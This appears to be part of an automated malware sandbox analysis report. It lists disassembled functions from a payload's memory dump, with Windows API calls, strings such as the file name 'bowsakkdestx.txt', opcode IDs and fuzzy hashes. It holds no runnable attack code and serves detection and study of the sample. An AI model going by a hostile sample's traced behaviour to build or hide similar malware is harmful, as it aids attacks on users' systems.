                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: a6fce066601bd783810d75e43b0aa94f9dfffba74059849837dce922726678b2
                                                                                                                                                                        • Instruction ID: 4438dfc30597c28cfab0107905afe0a611595579ee8a3bd412c5860da0d895f3
                                                                                                                                                                        • Opcode Fuzzy Hash: a6fce066601bd783810d75e43b0aa94f9dfffba74059849837dce922726678b2
                                                                                                                                                                        • Instruction Fuzzy Hash: 0851C37274C1049BDB24CF1CDC84A6A77E6EF86710B2489ADF846CB741EE31DD508BA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: 05b2969bd22f04488ca94a28a1033411ee20e1bb262140ac8a7d19541986219a
                                                                                                                                                                        • Instruction ID: e9a6aef1367425fc40ec05127a7b9d09724c274b9901f66b6891eb3ff1e1811a
                                                                                                                                                                        • Opcode Fuzzy Hash: 05b2969bd22f04488ca94a28a1033411ee20e1bb262140ac8a7d19541986219a
                                                                                                                                                                        • Instruction Fuzzy Hash: BE310831318304ABDB24DF4CDC85A6AB7E6EBC27107204A9DF865DB781D7B1ED418BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • UuidCreate.RPCRT4(?), ref: 00B9C5DA
                                                                                                                                                                        • UuidToStringA.RPCRT4(?,00000000), ref: 00B9C5F6
                                                                                                                                                                        • RpcStringFreeA.RPCRT4(00000000), ref: 00B9C640
                                                                                                                                                                        Strings
                                                                                                                                                                        • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 00B9C687
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: StringUuid$CreateFree
                                                                                                                                                                        • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                                                                                        • API String ID: 3044360575-2335240114
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B9C48B
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00B9C4A9
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendFolder
                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                        • API String ID: 29327785-2616962270
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00BABA4A
                                                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00BABA73
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClassCursorLoadRegister
                                                                                                                                                                        • String ID: 0$LPCWSTRszWindowClass
                                                                                                                                                                        • API String ID: 1693014935-1496217519
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B9C438
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00B9C44E
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00B9C45B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendDeleteFileFolder
                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                        • API String ID: 610490371-2616962270
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2974526305-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00BCC6AD
                                                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00BCC6DB
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,1C74C085,00000000,00000000,1C74C085,00BCC0ED,?,00BFBBEF,00000003), ref: 00BCC709
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,1C74C085,00000000,00000000,1C74C085,00BCC0ED,?,00BFBBEF,00000003), ref: 00BCC73F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • ___BuildCatchObject.LIBCMT ref: 00C570AB
                                                                                                                                                                          • Part of subcall function 00C577A0: ___BuildCatchObjectHelper.LIBCMT ref: 00C577D2
                                                                                                                                                                          • Part of subcall function 00C577A0: ___AdjustPointer.LIBCMT ref: 00C577E9
                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00C570C2
                                                                                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 00C570D4
                                                                                                                                                                        • CallCatchBlock.LIBCMT ref: 00C570F8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2901542994-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BB5007: __getptd_noexit.LIBCMT ref: 00BB5008
                                                                                                                                                                          • Part of subcall function 00BB5007: __amsg_exit.LIBCMT ref: 00BB5015
                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00BB5A01
                                                                                                                                                                          • Part of subcall function 00BB8C96: __calloc_impl.LIBCMT ref: 00BB8CA5
                                                                                                                                                                        • __lock.LIBCMT ref: 00BB5A37
                                                                                                                                                                        • ___addlocaleref.LIBCMT ref: 00BB5A43
                                                                                                                                                                        • __lock.LIBCMT ref: 00BB5A57
                                                                                                                                                                          • Part of subcall function 00BB5208: __getptd_noexit.LIBCMT ref: 00BB5208
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2580527540-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 00BA27B9
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BA27C3
                                                                                                                                                                          • Part of subcall function 00BB0C62: __FF_MSGBANNER.LIBCMT ref: 00BB0C79
                                                                                                                                                                          • Part of subcall function 00BB0C62: __NMSG_WRITE.LIBCMT ref: 00BB0C80
                                                                                                                                                                          • Part of subcall function 00BB0C62: RtlAllocateHeap.NTDLL(00E50000,00000000,00000001,00000001,?,?,?,00BC0E81,00000001,00000000,?,?,?,00BC0D1A,00BDF284,?), ref: 00BB0CA5
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA27CE
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 00BA27E4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2824100046-0
                                                                                                                                                                        • Opcode ID: 3d9dcaad5f8e4261795bcea76ca99668f9772f2743072d2b2585248bbbc150a3
                                                                                                                                                                        • Instruction ID: 445921e414d7541ce6a20c3567e08029c2da0256dbf48c2bc3843144633dbffb
                                                                                                                                                                        • Opcode Fuzzy Hash: 3d9dcaad5f8e4261795bcea76ca99668f9772f2743072d2b2585248bbbc150a3
                                                                                                                                                                        • Instruction Fuzzy Hash: 70F02735701304BFE7206A659C8AFBB7ADDEBC6761F100165B604F32C1EAA16D0152F1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 00BA2806
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BA2814
                                                                                                                                                                          • Part of subcall function 00BB0C62: __FF_MSGBANNER.LIBCMT ref: 00BB0C79
                                                                                                                                                                          • Part of subcall function 00BB0C62: __NMSG_WRITE.LIBCMT ref: 00BB0C80
                                                                                                                                                                          • Part of subcall function 00BB0C62: RtlAllocateHeap.NTDLL(00E50000,00000000,00000001,00000001,?,?,?,00BC0E81,00000001,00000000,?,?,?,00BC0D1A,00BDF284,?), ref: 00BB0CA5
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA281F
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00BA2832
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2824100046-0
                                                                                                                                                                        • Opcode ID: f34d7beaba954fe784c15103568276d2e5cb28271367e0561eef23a3f864c028
                                                                                                                                                                        • Instruction ID: 96f683d75dd3ea213c532f80157fa295b80504112c23f64960666895dab6705c
                                                                                                                                                                        • Opcode Fuzzy Hash: f34d7beaba954fe784c15103568276d2e5cb28271367e0561eef23a3f864c028
                                                                                                                                                                        • Instruction Fuzzy Hash: 82E08C7A3016247FE51027596C8AFBF6A5CCBC27B6F100252F611E22E2CAE05C0281B0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: 5136eaa27dc19adf402dcb258a9fde3a36f30e423d14d3366af1e1a33feaa86b
                                                                                                                                                                        • Instruction ID: 7b794273970480c62e98a6a457eb00d663ccb297d585f3a94b9e4ee660671495
                                                                                                                                                                        • Opcode Fuzzy Hash: 5136eaa27dc19adf402dcb258a9fde3a36f30e423d14d3366af1e1a33feaa86b
                                                                                                                                                                        • Instruction Fuzzy Hash: 13C13730608209DBCF24CF58D9C09AAB3F6FFC6300B6045ADE8468B655DBB0ED55CBA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                        • String ID: .\crypto\asn1\tasn_new.c
                                                                                                                                                                        • API String ID: 2102423945-2878120539
                                                                                                                                                                        • Opcode ID: 39d276ddad72ab70d019255668fa086557507311c043cb68aa54c21788d6ca66
                                                                                                                                                                        • Instruction ID: 18504c4efdb3d22cdf3fbfc233ad8afd1acaba16a1214a721df5e290ce2f4694
                                                                                                                                                                        • Opcode Fuzzy Hash: 39d276ddad72ab70d019255668fa086557507311c043cb68aa54c21788d6ca66
                                                                                                                                                                        • Instruction Fuzzy Hash: 6B51E87174030627E730AEA6DC82F7B77DCDF41B54F260429FA24951C2EBA5EA44D271
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00C10686
                                                                                                                                                                          • Part of subcall function 00BE4C00: _raise.LIBCMT ref: 00BE4C18
                                                                                                                                                                        Strings
                                                                                                                                                                        • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 00C1062E
                                                                                                                                                                        • .\crypto\evp\digest.c, xrefs: 00C10638
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset_raise
                                                                                                                                                                        • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                                                                                        • API String ID: 1484197835-3867593797
                                                                                                                                                                        • Opcode ID: 32ec546d98c41d3935baa6bd1a205643af333bcb26953fd5a2ecaae3244242cd
                                                                                                                                                                        • Instruction ID: 77a43228e8f1018fab35f714dd25c5014fe4b4c519b5b4bc633e86866c4ff27f
                                                                                                                                                                        • Opcode Fuzzy Hash: 32ec546d98c41d3935baa6bd1a205643af333bcb26953fd5a2ecaae3244242cd
                                                                                                                                                                        • Instruction Fuzzy Hash: 43014B75600200AFC310DF48EC42E6AB7E5AFC9304F294468F988DB362D7A1ED95DB95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%